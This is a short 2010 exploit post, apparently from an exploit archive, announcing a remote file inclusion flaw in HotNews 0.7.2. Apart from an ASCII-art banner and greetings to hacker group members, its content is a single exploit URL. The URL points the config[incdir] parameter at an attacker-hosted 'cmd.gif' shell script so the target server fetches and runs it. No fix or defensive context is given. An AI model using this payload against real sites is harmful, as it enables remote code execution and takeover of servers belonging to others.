HotNews 0.7.2 Remote File Inclusion
Posted on 11 April 2010
=================================== HotNews 0.7.2 Remote File Inclusion =================================== ================================================================================================ ================================================================================================ == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ == == @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ == == @@ @@@@@@ @@@@@@@ @@ @ @@ @@@@@@ @@ @@ @@ @@@@@@ == == @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ == == @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ == == @@ @@@@@@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@ == == @@ @@@@@@ @@ @@ @@ @@ @@@@@@@@@@ @@@@@@ @@@@@@ @@ @@ @@@@@@ == == == ================================================================================================ ================================================================================================ ||| ||| ||| ||| [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ [[ [[ [[ HotNews 0.7.2 Remote File Inclusion Vulnerability [[ [[ [[ [[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ | [[ [[ [[ [[ [[ [[ ## Exploit: [[ [[ [[ [[- http://[target]/[path]/includes/hnmain.inc.php3?config[incdir]=[attacker.com]/cmd.gif??? [[ [[ [[ [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ||| ||| ||| ||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~ Greetz and Thanks to: All member gcc, all member manadocoding ~~~~ ~~~~ ~~~~ ~~~~ MC & gcc team : team_elite , devilbat , zreg , doniskynet , 0pa ~~~~ ~~~~ thanks for : cr4wl3r [ http://shell4u.tk/ ] ~~~~ ~~~~ ~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Inj3ct0r.com [2010-04-11]